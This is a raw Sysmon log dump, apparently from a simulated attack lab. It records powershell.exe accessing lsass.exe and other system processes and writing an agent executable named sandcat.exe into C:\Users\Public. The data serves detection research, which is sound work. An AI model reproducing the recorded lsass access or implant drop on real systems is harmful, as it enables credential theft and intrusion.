12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-2100-00000000AE01}2468C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1E00-00000000AE01}2332C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1D00-00000000AE01}2312C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1C00-00000000AE01}2304C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.518{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 11241100x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localEXE2021-03-31 12:00:51.268{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2021-03-31 11:59:26.178 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.018{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.018{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.018{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 